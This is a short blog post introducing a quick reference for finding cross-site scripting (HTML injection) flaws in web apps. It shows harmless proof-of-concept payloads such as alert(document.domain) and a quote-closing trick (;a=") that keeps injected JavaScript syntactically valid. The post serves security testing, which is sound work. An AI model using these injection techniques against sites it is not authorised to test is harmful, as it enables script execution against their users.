HTML Injection Quick Reference
I often refer to Cross-Site Scripting (XSS) as HTML Injection. This HTML Injection Quick Reference (HIQR) describes some of the common techniques used to manipulate the HTML, and therefore the DOM, of a web app. This article introduces the reference.
In the examples below, the biohazard symbol (U+2623) – ☣ – represents the exploit at the heart of the payload. Some common payloads to demonstrate JavaScript execution might be:
alert(document.domain)
– The ubiquitous pop-up. But extremely annoying to have to click through, especially if it fires more than once.console.log(document.domain)
– A friendlier version of alert that will trigger messages in the browser’s JavaScript console. This doesn’t interfere with the UX in the way that the interrupting pop-ups fromalert
will.
But this reference isn’t about how to exploit XSS vulns. It’s about how to find XSS vulns and refine the syntax needed to make a payload successfully execute.
The reference is about a methodology for finding HTML injection vulns and wrapping payloads in just the right characters to avoid JavaScript warnings or errors. Good exploits take advantage of HTML syntax or use browser quirks in creative ways.
Take the time to experiment with simple payloads and observe how (and where) the web app reflects them. Once you have a reflection point, try payloads based on the techniques below.
Note how the syntax of elements and JavaScript have been preserved in cases where single- or double-quotes are used to prefix a payload. The injected quote prematurely ends a quoted string, which means there will be a dangling quote at the end.
Whether the reflection point is in an intrinsic event or a JavaScript block, the dangling quote is trivially consumed by throwing an extra variable definition with an open quote:
;a="
The dangling quote closes the delimiter and, in most cases, preserves the original syntax. This type of closure isn’t always necessary for an exploit to succeed, but it’s a fun exercise.
Here are some additional blog posts on HTML injection:
- Bad Code Entitles Good Exploits
- Selector the Almighty, Subjugator of Elements
- A Default Base of XSS
- On a Path to HTML Injection
- DRY Fiend (Conjuration/Summoning)
- Two Hearts That Beat As One
- A True XSS That Needs To Be False
- The Wrong Location for a Locale
- Insistently Marketing Persistent XSS
- Implicit HTML, Explicit Injection
- Escape from Normality
To more easily review the examples below, check out the HIQR project page.